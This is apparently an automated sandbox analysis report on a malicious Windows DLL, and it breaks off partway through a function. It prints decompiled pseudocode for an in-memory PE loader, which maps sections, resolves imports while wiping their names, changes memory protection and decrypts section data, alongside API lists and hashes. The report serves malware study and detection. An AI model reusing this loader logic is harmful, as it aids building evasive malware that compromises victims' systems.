Instruction Fuzzy Hash: FCE04FA4644209B6EB00DB91CD0AFB972BCAB4174AF500084FB01E60C0E7B49E04EB65

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E1252, Relevance: 3.1, APIs: 2, Instructions: 66
nativeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E6D8E1252(void* __eax, void* __edx) {
				char _v8;
				void** _v12;
				void* _t17;
				long _t23;
				long _t25;
				long _t28;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				void** _t36;
				intOrPtr _t38;

				_t31 = __edx;
				_t35 = __eax;
				_t17 = E6D8E1314( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t34 = _v8;
					_t28 = E6D8E16DB( &_v8, _t34, _t35);
					if(_t28 == 0) {
						_t38 =  *((intOrPtr*)(_t34 + 0x3c)) + _t34;
						_t23 = E6D8E1792(_t34, _t38); // executed
						_t28 = _t23;
						if(_t28 == 0) {
							_t25 = E6D8E1CCA(_t38, _t31, _t34); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t34);
								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t34))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t36 = _v12;
					_t36[6](NtClose( *_t36));
					E6D8E19CF(_t36);
					L8:
					return _t28;
				}
			}

0x6d8e1252
0x6d8e125a
0x6d8e1277
0x6d8e127e
0x6d8e12dd
0x00000000
0x6d8e1280
0x6d8e1280
0x6d8e128a
0x6d8e128e
0x6d8e1293
0x6d8e1297
0x6d8e129c
0x6d8e12a0
0x6d8e12a5
0x6d8e12aa
0x6d8e12ae
0x6d8e12b3
0x6d8e12b4
0x6d8e12b8
0x6d8e12bd
0x6d8e12c5
0x6d8e12c5
0x6d8e12bd
0x6d8e12ae
0x6d8e12a0
0x6d8e12c7
0x6d8e12d0
0x6d8e12d4
0x6d8e12de
0x6d8e12e4
0x6d8e12e4

APIs

Part of subcall function 6D8E1314: GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,6D8E127C,?,?,?,00000002,?,?,?), ref: 6D8E1339
Part of subcall function 6D8E1314: GetProcAddress.KERNEL32(00000000,?), ref: 6D8E135B
Part of subcall function 6D8E1314: GetProcAddress.KERNEL32(00000000,?), ref: 6D8E1371
Part of subcall function 6D8E1314: GetProcAddress.KERNEL32(00000000,?), ref: 6D8E1387
Part of subcall function 6D8E1314: GetProcAddress.KERNEL32(00000000,?), ref: 6D8E139D
Part of subcall function 6D8E1314: GetProcAddress.KERNEL32(00000000,?), ref: 6D8E13B3

Part of subcall function 6D8E16DB: memcpy.NTDLL(?,00000002,6D8E128A,?,0000000A,?,?,?,6D8E128A,?,0000000A,?,?,?,00000002), ref: 6D8E1708
Part of subcall function 6D8E16DB: memcpy.NTDLL(?,00000002,?,00000002,?,?,?,?), ref: 6D8E173B

NtClose.NTDLL(?,?,0000000A,?,?,?,00000002,?,?,?,?), ref: 6D8E12CC

Part of subcall function 6D8E1792: LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 6D8E17C8
Part of subcall function 6D8E1792: lstrlenA.KERNEL32(00000002), ref: 6D8E17DE
Part of subcall function 6D8E1792: memset.NTDLL ref: 6D8E17E8
Part of subcall function 6D8E1792: GetProcAddress.KERNEL32(?,00000002), ref: 6D8E184B
Part of subcall function 6D8E1792: lstrlenA.KERNEL32(-00000002), ref: 6D8E1860
Part of subcall function 6D8E1792: memset.NTDLL ref: 6D8E186A

Part of subcall function 6D8E1CCA: VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 6D8E1CF8
Part of subcall function 6D8E1CCA: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 6D8E1D4F
Part of subcall function 6D8E1CCA: GetLastError.KERNEL32(?,?), ref: 6D8E1D55

GetLastError.KERNEL32(?,?,?,?), ref: 6D8E12BF

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$CloseHandleLibraryLoadModule
String ID:
API String ID: 2954739140-0
Opcode ID: 9098b42da6481f2af1d402aba0f9bb0b6b4f0b0803f99337b55bda8d40cecc36
Instruction ID: a11ef0d86f7e2019c6acde932b0cd854d105a6612c9fb7b5ce0f386fb6c5833f
Opcode Fuzzy Hash: 9098b42da6481f2af1d402aba0f9bb0b6b4f0b0803f99337b55bda8d40cecc36
Instruction Fuzzy Hash: 9511AC726046157BD711A7E9CC8CEAB77FCAF47798B010924FB01D7640EBA4ED058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E1AD1, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6D8E1AD1(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6d8e1ae3
0x6d8e1ae9
0x6d8e1af7
0x6d8e1afe
0x6d8e1b03
0x6d8e1b09
0x00000000
0x6d8e1b0a
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6D8E1C94,00000002,00000000,?,?,00000000,?,?,6D8E1C94,?), ref: 6D8E1AFE

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 40b2588bacd3e934ec06e4315a1833f1987e058e3419e8c3de615179c8f363ef
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 61F037B590420CFFEB119FA5DC89C9FBBBDEB45395B108D39F152E1090E6309E188B60

Uniqueness

Uniqueness Score: -1.00%

Function 6D91BF40, Relevance: 31.8, APIs: 21, Instructions: 321timememoryCOMMON

Download Yara Rule

APIs

__MarkAllocaS.LIBCMTD ref: 6D91C00C
std::_Timevec::_Timevec.LIBCPMTD ref: 6D91C027
std::_Timevec::_Timevec.LIBCPMTD ref: 6D91C032
std::_Mutex::_Lock.LIBCPMTD ref: 6D91C050

Part of subcall function 6D924090: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6D9240C3

std::_Mutex::_Lock.LIBCPMTD ref: 6D91C08D
std::_Mutex::_Lock.LIBCPMTD ref: 6D91C0D0

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiWide
String ID:
API String ID: 2069878369-0
Opcode ID: 71c3a2e7d4408978a4433689b0d86dd71013293afe2b450550ebdbea406ef5e6
Instruction ID: 6d1b096e6f26c94561835ec90a5e4bf0dead3813e78f7a71a62bf46af91a10aa
Opcode Fuzzy Hash: 71c3a2e7d4408978a4433689b0d86dd71013293afe2b450550ebdbea406ef5e6
Instruction Fuzzy Hash: 04C119B1A1810DEBDB05DFA4DC91BEEB7B5AF59308F114168E616A7380DB30EA45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E1DBD, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6D8E1DBD(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6D8E2150();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6d8e4150;
				_push(_t15 + 0x6d8e505e);
				_push(_t15 + 0x6d8e5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6D8E214A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6d8e4140, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6d8e1dbd
0x6d8e1dc6
0x6d8e1dca
0x6d8e1dd0
0x6d8e1dd5
0x6d8e1dda
0x6d8e1ddd
0x6d8e1de0
0x6d8e1de5
0x6d8e1de6
0x6d8e1de9
0x6d8e1df4
0x6d8e1dfb
0x6d8e1dff
0x6d8e1e01
0x6d8e1e02
0x6d8e1e05
0x6d8e1e0a
0x6d8e1e14
0x6d8e1e16
0x6d8e1e16
0x6d8e1e2a
0x6d8e1e30
0x6d8e1e34
0x6d8e1e84
0x6d8e1e36
0x6d8e1e3f
0x6d8e1e55
0x6d8e1e5d
0x6d8e1e6f
0x6d8e1e73
0x00000000
0x00000000
0x6d8e1e5f
0x6d8e1e62
0x6d8e1e67
0x6d8e1e69
0x6d8e1e69
0x6d8e1e4a
0x6d8e1e4c
0x6d8e1e75
0x6d8e1e76
0x6d8e1e76
0x6d8e1e3f
0x6d8e1e8c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,6D8E11EF,0000000A,?), ref: 6D8E1DCA
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D8E1DE0
_snwprintf.NTDLL ref: 6D8E1E05
CreateFileMappingW.KERNELBASE(000000FF,6D8E4140,00000004,00000000,?,?), ref: 6D8E1E2A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D8E11EF,0000000A), ref: 6D8E1E41
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6D8E1E55
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D8E11EF,0000000A), ref: 6D8E1E6D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D8E11EF), ref: 6D8E1E76
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D8E11EF,0000000A), ref: 6D8E1E7E

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: d57a0b9edd281d2344b5f493e423f78dc3aaa4b5d4287e9da33c9aa3fe355352
Instruction ID: 7ddcaf629f75ca7a58192caab1dfd5d3149b6e2f7e47085c80046e7c00e26095
Opcode Fuzzy Hash: d57a0b9edd281d2344b5f493e423f78dc3aaa4b5d4287e9da33c9aa3fe355352
Instruction Fuzzy Hash: 8C215CB2600109BBDB11AFA8CC8CFAE77B9EB4A391F118465F625D7150D7709D45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E1792, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D8E1792(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62); // executed
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

0x6d8e179b
0x6d8e17a1
0x6d8e17a8
0x6d8e17ab
0x6d8e18ac
0x6d8e18b1
0x6d8e18b1
0x6d8e17b2
0x6d8e17b5
0x6d8e17ba
0x6d8e17bd
0x6d8e18ab
0x00000000
0x6d8e18ab
0x6d8e17c4
0x6d8e17c4
0x6d8e17c8
0x6d8e17d0
0x6d8e17d3
0x00000000
0x00000000
0x6d8e17d9
0x6d8e17e8
0x6d8e17ed
0x6d8e17ef
0x6d8e17f2
0x6d8e17f7
0x6d8e1803
0x6d8e1803
0x6d8e1806
0x6d8e180a
0x6d8e1890
0x6d8e1890
0x6d8e1893
0x6d8e1898
0x6d8e189b
0x00000000
0x00000000
0x6d8e18aa
0x00000000
0x6d8e18aa
0x6d8e1814
0x6d8e1817
0x00000000
0x6d8e1819
0x6d8e1819
0x6d8e1822
0x6d8e1837
0x6d8e1839
0x6d8e1830
0x6d8e1830
0x6d8e1830
0x6d8e181b
0x6d8e181b
0x6d8e181b
0x6d8e183e
0x6d8e183e
0x6d8e1841
0x6d8e1843
0x6d8e1843
0x6d8e184b
0x6d8e1853
0x6d8e1856
0x00000000
0x00000000
0x6d8e185a
0x6d8e185c
0x6d8e186a
0x6d8e186f
0x6d8e186f
0x6d8e1878
0x6d8e187b
0x6d8e187e
0x6d8e1882
0x00000000
0x6d8e1884
0x6d8e188d
0x6d8e188d
0x00000000
0x6d8e188d
0x6d8e1886
0x6d8e1886
0x00000000
0x6d8e1886
0x6d8e17fb
0x6d8e17fd
0x00000000
0x00000000
0x00000000
0x6d8e17fd
0x6d8e18a3
0x00000000

APIs

LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 6D8E17C8
lstrlenA.KERNEL32(00000002), ref: 6D8E17DE
memset.NTDLL ref: 6D8E17E8
GetProcAddress.KERNEL32(?,00000002), ref: 6D8E184B
lstrlenA.KERNEL32(-00000002), ref: 6D8E1860
memset.NTDLL ref: 6D8E186A

Strings

~, xrefs: 6D8E18A3

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: 1e322cc2b668d0298f3006e1a96c3aa2e1a2ccde052f03cd92f7168df88f276d
Instruction ID: 928257d2466c017fb09fdf693d6c50a1aa6ef62a746bd14dff15da7c073c2c87
Opcode Fuzzy Hash: 1e322cc2b668d0298f3006e1a96c3aa2e1a2ccde052f03cd92f7168df88f276d
Instruction Fuzzy Hash: 11316375A01226AFDB14CF5AC898BBEB7B8BF46785F114469ED15DB240D730EA01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E146A, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6d8e4108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6d8e410c;
						if( *0x6d8e410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6d8e4118;
								if( *0x6d8e4118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6d8e410c);
						}
						HeapDestroy( *0x6d8e4110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6d8e4108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6d8e4110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6d8e4130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E6D8E154A, E6D8E1413(_a12, 0, 0x6d8e4118, _t41), 0,  &_a8); // executed
							 *0x6d8e410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6d8e146d
0x6d8e1479
0x6d8e147b
0x6d8e147e
0x6d8e14f8
0x6d8e14fe
0x6d8e1500
0x6d8e1502
0x6d8e1508
0x6d8e150a
0x6d8e150f
0x6d8e1512
0x6d8e151d
0x6d8e151f
0x00000000
0x00000000
0x6d8e1521
0x6d8e1524
0x6d8e1526
0x00000000
0x00000000
0x00000000
0x6d8e1526
0x6d8e152e
0x6d8e152e
0x6d8e153a
0x6d8e153a
0x6d8e1480
0x6d8e1481
0x6d8e14a1
0x6d8e14a7
0x6d8e14a9
0x6d8e14ae
0x6d8e14ee
0x6d8e14ee
0x6d8e14b0
0x6d8e14b8
0x6d8e14bf
0x6d8e14d8
0x6d8e14e0
0x6d8e14e5
0x6d8e14ea
0x00000000
0x6d8e14ea
0x6d8e14e5
0x6d8e14ae
0x6d8e1481
0x6d8e1547

APIs

InterlockedIncrement.KERNEL32(6D8E4108), ref: 6D8E148C
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6D8E14A1
CreateThread.KERNEL32 ref: 6D8E14D8
InterlockedDecrement.KERNEL32(6D8E4108), ref: 6D8E14F8
SleepEx.KERNEL32(00000064,00000001), ref: 6D8E1512
CloseHandle.KERNEL32 ref: 6D8E152E
HeapDestroy.KERNEL32 ref: 6D8E153A

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
String ID:
API String ID: 3416589138-0
Opcode ID: 02b04e5715f6cf0392494d5eae0c83952a3f577722a5cfb740ec9c5eeaa7167e
Instruction ID: 55f3b4ba24c4121c8d9f74f0bc2a4e6644b0e096cec41ab6b7e3de8affd70aa0
Opcode Fuzzy Hash: 02b04e5715f6cf0392494d5eae0c83952a3f577722a5cfb740ec9c5eeaa7167e
Instruction Fuzzy Hash: A5211A31604205ABDF009FAD888CB6E7BB9BB9B7957114929F51AD2250E734DE00CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E1314, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D8E1314(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E6D8E1BD2(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x6d8e4150 + 0x6d8e5014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x6d8e4150 + 0x6d8e50dc);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E6D8E19CF(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x6d8e4150 + 0x6d8e50ec);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x6d8e4150 + 0x6d8e50ff);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x6d8e4150 + 0x6d8e5114);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x6d8e4150 + 0x6d8e512a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E6D8E1C22(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6d8e1323
0x6d8e1327
0x6d8e13e9
0x6d8e132d
0x6d8e1345
0x6d8e1354
0x6d8e135b
0x6d8e135f
0x6d8e1362
0x6d8e13e1
0x6d8e13e2
0x6d8e1364
0x6d8e1371
0x6d8e1375
0x6d8e1378
0x00000000
0x6d8e137a
0x6d8e1387
0x6d8e138b
0x6d8e138e
0x00000000
0x6d8e1390
0x6d8e139d
0x6d8e13a1
0x6d8e13a4
0x00000000
0x6d8e13a6
0x6d8e13b3
0x6d8e13b7
0x6d8e13ba
0x00000000
0x6d8e13bc
0x6d8e13c2
0x6d8e13c7
0x6d8e13ce
0x6d8e13d5
0x6d8e13d8
0x00000000
0x6d8e13da
0x6d8e13dd
0x6d8e13dd
0x6d8e13d8
0x6d8e13ba
0x6d8e13a4
0x6d8e138e
0x6d8e1378
0x6d8e1362
0x6d8e13f7

APIs

Part of subcall function 6D8E1BD2: HeapAlloc.KERNEL32(00000000,?,6D8E1FD0,?,00000000,00000000,?,6D8E1069), ref: 6D8E1BDE

GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,6D8E127C,?,?,?,00000002,?,?,?), ref: 6D8E1339
GetProcAddress.KERNEL32(00000000,?), ref: 6D8E135B
GetProcAddress.KERNEL32(00000000,?), ref: 6D8E1371
GetProcAddress.KERNEL32(00000000,?), ref: 6D8E1387
GetProcAddress.KERNEL32(00000000,?), ref: 6D8E139D
GetProcAddress.KERNEL32(00000000,?), ref: 6D8E13B3

Part of subcall function 6D8E1C22: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,00000002), ref: 6D8E1C7F
Part of subcall function 6D8E1C22: memset.NTDLL ref: 6D8E1CA1

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: bfc2d865e15c74bb68eaa789613514ff43e2205d7137bec8be82eff1f40ec918
Instruction ID: 7ed59360c6fc3048870498c7f5d4be43cd1128fbf7323d8599cc5f4d627f8eee
Opcode Fuzzy Hash: bfc2d865e15c74bb68eaa789613514ff43e2205d7137bec8be82eff1f40ec918
Instruction Fuzzy Hash: 4E213EB160070A9FDB00DFA9C888E6A77FCEB4A7807014459F915C7202E778E901CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E18B4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D8E18B4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6d8e4130;
				_t39 = E6D8E1568(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6d8e414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6d8e5132; // 0x6d8e5132
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6D8E15C2(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6d8e414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
